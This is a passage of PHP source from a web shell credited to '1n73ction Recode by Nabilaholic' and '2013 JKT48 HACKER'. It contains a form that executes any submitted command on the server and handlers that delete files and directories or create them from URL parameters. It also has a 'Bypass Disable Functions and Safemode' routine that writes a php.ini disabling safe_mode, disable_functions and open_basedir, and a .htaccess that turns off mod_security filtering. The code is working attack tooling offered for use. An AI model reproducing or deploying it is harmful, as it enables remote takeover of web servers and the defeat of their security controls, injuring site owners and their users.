  3384. </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
  3385. </table>
  3386. </td>
  3387. </tr>
  3388. </table>
  3389. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3390. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){  ?>
  3391. <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  3392. <table class="cmdbox">
  3393. <tr><td colspan="2">
  3394. <textarea class="output" readonly>
  3395. <?php
  3396. if(isset($_POST['submitcmd'])) {
  3397.         echo @exe($_POST['cmd']);
  3398. }
  3399. ?>
  3400. </textarea>
  3401. <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
  3402. </table>
  3403. </form>
  3404. <?php }
  3405. else {
  3406. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
  3407.         $file = $_GET['delete'];
  3408.         @unlink($file);
  3409. }
  3410. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
  3411.         @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  3412. }
  3413. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
  3414.         $path = $pwd.$_GET['mkdir'];
  3415.         @mkdir($path);
  3416. }
  3417.         $buff = showdir($pwd,$prompt);
  3418.         echo $buff;
  3419. }
  3420. ?>
  3421. <br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
  3422. <?php
  3423. if(isset($_POST['ini']))
  3424.         {
  3425.                
  3426. $byphp = "safe_mode = Off
  3427. disable_functions = None
  3428. safe_mode_gid = OFF
  3429. open_basedir = OFF
  3430. allow_url_fopen = On";
  3431. $byht = "<IfModule mod_security.c>
  3432. SecFilterEngine Off
  3433. SecFilterScanPOST Off
  3434. SecFilterCheckURLEncoding Off
  3435. SecFilterCheckUnicodeEncoding Off
  3436. </IfModule>";
  3437. file_put_contents("php.ini",$byphp);
  3438. file_put_contents(".htaccess",$byht);
  3439. echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>";
  3440. die();
  3441.                
  3442.                 }
  3443.                
  3444. ?><center><br><br><div class="info">1n73ction Recode by Nabilaholic</div><br>
  3445. <div class="jaya">&copy; 2013 JKT48 HACKER</div></center><br><br>
  3446. </script>
  3447. </div>
  3448. </body>
  3449. </html>